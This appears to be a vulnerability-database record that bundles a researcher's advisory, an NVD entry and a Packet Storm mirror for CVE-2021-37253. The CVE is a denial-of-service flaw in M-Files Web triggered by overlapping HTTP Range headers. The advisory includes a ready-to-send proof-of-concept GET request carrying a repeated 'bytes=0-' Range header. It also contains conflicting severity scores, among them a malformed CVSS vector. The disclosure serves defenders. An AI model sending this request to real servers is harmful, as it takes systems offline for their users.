M-Files Web versions prior to 20.10.9524.1 and M-Files Web versions prior to 20.10.9445.0 contain an improper range header processing vulnerability. A remote unauthenticated attacker may send crafted requests with overlapping ranges (via HTTP requests with specially crafted Range or Request-Range headers) to cause the web application to compress each of the requested bytes, resulting in a crash due to excessive memory and CPU consumption and preventing users from accessing the system.
{"id": "1337DAY-ID-37094", "vendorId": null, "type": "zdt", "bulletinFamily": "exploit", "title": "M-Files Web Denial Of Service Vulnerability", "description": "M-Files Web versions prior to 20.10.9524.1 and M-Files Web versions prior to 20.10.9445.0 contain an improper range header processing vulnerability. A remote unauthenticated attacker may send crafted requests with overlapping ranges (via HTTP requests with a specially-crafted Range or Request-Range headers) to cause the web application to compress each of the requested bytes, resulting in a crash due to excessive memory and CPU consumption and preventing users from accessing the system.", "published": "2021-12-04T00:00:00", "modified": "2021-12-04T00:00:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "href": "https://0day.today/exploit/description/37094", "reporter": "Murat Aydemir", "references": [], "cvelist": ["CVE-2021-37253"], "immutableFields": [], "lastseen": "2021-12-09T06:08:03", "viewCount": 196, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": 
["CVE-2021-37253"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:165139"]}], "rev": 4}, "score": {"value": 5.7, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2021-37253"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:165139"]}]}, "exploitation": null, "vulnersScore": 5.7}, "sourceHref": "https://0day.today/exploit/37094", "sourceData": "I. SUMMARY\n=============================================================================================================================================================\nTitle: M-Files Web Improper Range Header Processing Denial of Services\n(DoS) Vulnerability\nProduct: M-Files Web version before 20.10.9524.1, M-Files Web version\nbefore 20.10.9445.0\nVulnerability Type(s): Denial of Services (DoS)\nCredit by/Researcher: Murat Aydemir (Turkey)\nContact: https://twitter.com/mrtydmr75\nGithub: https://github.com/murataydemir\n=============================================================================================================================================================\n\nII. CVE REFERENCE, CVSS SCORES & VULNERABILITY TYPES\n=============================================================================================================================================================\nCVE Number: CVE-2021-37253\nCVSSv3 Score: 4.3\nCVSSv3 Vector: CVSS:4.3 (AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L)\nSeverity: Medium\nConfidentiality Impact: None (There is no impact to the confidentiality of\nthe system)\nIntegrity Impact: None (There is no impact to the integrity of the system)\nAvailability Impact: Complete (There is a total shutdown of the affected\nresource. The attacker can render the resource completely unavailable)\nAccess Complexity: Low (Specialized access conditions or extenuating\ncircumstances do not exist. 
Very little knowledge or skill is required to\nexploit)\nAuthentication: Not required (Authentication is not required to exploit the\nvulnerability)\nGained Access: None\nVulnerability Type(s): Denial of Services (DoS)\nCWE ID: CWE-399 Resource Management Errors (\nhttps://cwe.mitre.org/data/definitions/399.html)\n=============================================================================================================================================================\n\nIII. TIMELINE\n=============================================================================================================================================================\nContact to Vendor: the 24th of August, 2020\nVendor (M-Files) Reply: the 3rd of November, 2020 (rejected vulnerability)\nContact to Vendor: the 4th of November, 2020 (provide additional\ninformations & some of proof of concepts)\nVendor (M-Files) Reply: the 6th of November, 2020 (accepted vulnerability\nand ask time to fix)\nVendor (M-Files) Reply: the 4th of August, 2021 (inform me that \"we're\naccepting this vulnerability but we'll not give an effort to fix that and\nalso will not apply any CVE for this vuln.\")\nContact to MITRE: the 4th of August, 2021 (contacted MITRE and applied for\nCVE. MITRE has reserved CVE to me for this vulnerability)\n=============================================================================================================================================================\n\nIV. DESCRIPTION & MITIGATION\n=============================================================================================================================================================\nM-Files Web version before 20.10.9524.1 and M-Files Web version before\n20.10.9445.0 contain an Improper Range Header Processing Vulnerability. 
A\nremote unauthenticated attacker may send crafted requests with overlapping\nranges (via HTTP requests with a specially-crafted Range or Request-Range\nheaders) to cause the web application to compress each of the requested\nbytes, resulting in a crash due to excessive memory and CPU consumption and\npreventing users from accessing the system.\n\nEven if this vulnerability (CVE-2021-37253) has been verified and accepted\nby the Vendor (M-Files), their security team also contacted me and informed\nme that no effort will be given to fixing this vulnerability. Thus, there\nis no active patch, update or mitigation plan for CVE-2021-37253\nvulnerability. These are not exactly fix the problem (maybe just\nremediation), however I strongly recommend you to restrict IP addresses for\nweb applications which incoming requests/clients or reconfigure the web\nserver for \"Byte-range Request Segment Size\" as soon as possible.\n=============================================================================================================================================================\n\nV. PROOF OF CONCEPT (POC) FOR CVE-2021-37253\n=============================================================================================================================================================\nThis is easy to detect and exploit for this vulnerability. 
Just find a\nstatic content (such as .png, .jpg, .jpeg, .js, .css and so on) and make a\nrequest as follows.\n\nGET /Icons/Standard/Listing/VaultMounting.png HTTP/1.1\nHost: <host>\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0)\nGecko/20100101 Firefox/79.0\nAccept: application/json, text/javascript, */*; q=0.01\nAccept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3\nConnection: close\nRange:\nbytes=0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-\n\nNote: this issue is valid and easly reproducable for all static assests\n(which has .png, .jpg, .jpeg, .js, .css, .gif extensions and so on)\n=============================================================================================================================================================\n\nVI. REFERENCE(S)\n=============================================================================================================================================================\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37253\nhttps://nvd.nist.gov/vuln/detail/CVE-2021-37253\n=============================================================================================================================================================\n", "category": "dos / poc", "verified": true, "_state": {"dependencies": 1646472113}}
{"cve": [{"lastseen": "2022-03-31T19:15:40", "description": "** DISPUTED ** M-Files Web before 20.10.9524.1 allows a denial of service via overlapping ranges (in HTTP requests with crafted Range or Request-Range headers). NOTE: this is disputed because the range behavior is the responsibility of the web server, not the responsibility of the individual web application.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-12-05T21:15:00", "type": "cve", "title": "CVE-2021-37253", "cwe": ["CWE-444"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-37253"], "modified": "2022-03-31T16:30:00", "cpe": [], "id": "CVE-2021-37253", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-37253", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": []}], "packetstorm": [{"lastseen": "2021-12-03T17:33:02", "description": "", "cvss3": {}, "published": "2021-12-03T00:00:00", "type": "packetstorm", "title": "M-Files Web Denial Of Service", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-37253"], "modified": "2021-12-03T00:00:00", "id": "PACKETSTORM:165139", "href": 
"https://packetstormsecurity.com/files/165139/M-Files-Web-Denial-Of-Service.html", "sourceData": "`I. SUMMARY \n============================================================================================================================================================= \nTitle: M-Files Web Improper Range Header Processing Denial of Services \n(DoS) Vulnerability \nProduct: M-Files Web version before 20.10.9524.1, M-Files Web version \nbefore 20.10.9445.0 \nVulnerability Type(s): Denial of Services (DoS) \nCredit by/Researcher: Murat Aydemir (Turkey) \nContact: https://twitter.com/mrtydmr75 \nGithub: https://github.com/murataydemir \n============================================================================================================================================================= \n \nII. CVE REFERENCE, CVSS SCORES & VULNERABILITY TYPES \n============================================================================================================================================================= \nCVE Number: CVE-2021-37253 \nCVSSv3 Score: 4.3 \nCVSSv3 Vector: CVSS:4.3 (AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L) \nSeverity: Medium \nConfidentiality Impact: None (There is no impact to the confidentiality of \nthe system) \nIntegrity Impact: None (There is no impact to the integrity of the system) \nAvailability Impact: Complete (There is a total shutdown of the affected \nresource. The attacker can render the resource completely unavailable) \nAccess Complexity: Low (Specialized access conditions or extenuating \ncircumstances do not exist. 
Very little knowledge or skill is required to \nexploit) \nAuthentication: Not required (Authentication is not required to exploit the \nvulnerability) \nGained Access: None \nVulnerability Type(s): Denial of Services (DoS) \nCWE ID: CWE-399 Resource Management Errors ( \nhttps://cwe.mitre.org/data/definitions/399.html) \n============================================================================================================================================================= \n \nIII. TIMELINE \n============================================================================================================================================================= \nContact to Vendor: the 24th of August, 2020 \nVendor (M-Files) Reply: the 3rd of November, 2020 (rejected vulnerability) \nContact to Vendor: the 4th of November, 2020 (provide additional \ninformations & some of proof of concepts) \nVendor (M-Files) Reply: the 6th of November, 2020 (accepted vulnerability \nand ask time to fix) \nVendor (M-Files) Reply: the 4th of August, 2021 (inform me that \"we're \naccepting this vulnerability but we'll not give an effort to fix that and \nalso will not apply any CVE for this vuln.\") \nContact to MITRE: the 4th of August, 2021 (contacted MITRE and applied for \nCVE. MITRE has reserved CVE to me for this vulnerability) \n============================================================================================================================================================= \n \nIV. DESCRIPTION & MITIGATION \n============================================================================================================================================================= \nM-Files Web version before 20.10.9524.1 and M-Files Web version before \n20.10.9445.0 contain an Improper Range Header Processing Vulnerability. 
A \nremote unauthenticated attacker may send crafted requests with overlapping \nranges (via HTTP requests with a specially-crafted Range or Request-Range \nheaders) to cause the web application to compress each of the requested \nbytes, resulting in a crash due to excessive memory and CPU consumption and \npreventing users from accessing the system. \n \nEven if this vulnerability (CVE-2021-37253) has been verified and accepted \nby the Vendor (M-Files), their security team also contacted me and informed \nme that no effort will be given to fixing this vulnerability. Thus, there \nis no active patch, update or mitigation plan for CVE-2021-37253 \nvulnerability. These are not exactly fix the problem (maybe just \nremediation), however I strongly recommend you to restrict IP addresses for \nweb applications which incoming requests/clients or reconfigure the web \nserver for \"Byte-range Request Segment Size\" as soon as possible. \n============================================================================================================================================================= \n \nV. PROOF OF CONCEPT (POC) FOR CVE-2021-37253 \n============================================================================================================================================================= \nThis is easy to detect and exploit for this vulnerability. Just find a \nstatic content (such as .png, .jpg, .jpeg, .js, .css and so on) and make a \nrequest as follows. 
\n \nGET /Icons/Standard/Listing/VaultMounting.png HTTP/1.1 \nHost: <host> \nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) \nGecko/20100101 Firefox/79.0 \nAccept: application/json, text/javascript, */*; q=0.01 \nAccept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 \nConnection: close \nRange: \nbytes=0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0- \n \nNote: this issue is valid and easly reproducable for all static assests \n(which has .png, .jpg, .jpeg, .js, .css, .gif extensions and so on) \n============================================================================================================================================================= \n \nVI. REFERENCE(S) \n============================================================================================================================================================= \nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37253 \nhttps://nvd.nist.gov/vuln/detail/CVE-2021-37253 \n============================================================================================================================================================= \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/165139/mfiles-dos.txt", "cvss": {"score": 0.0, "vector": "NONE"}}]}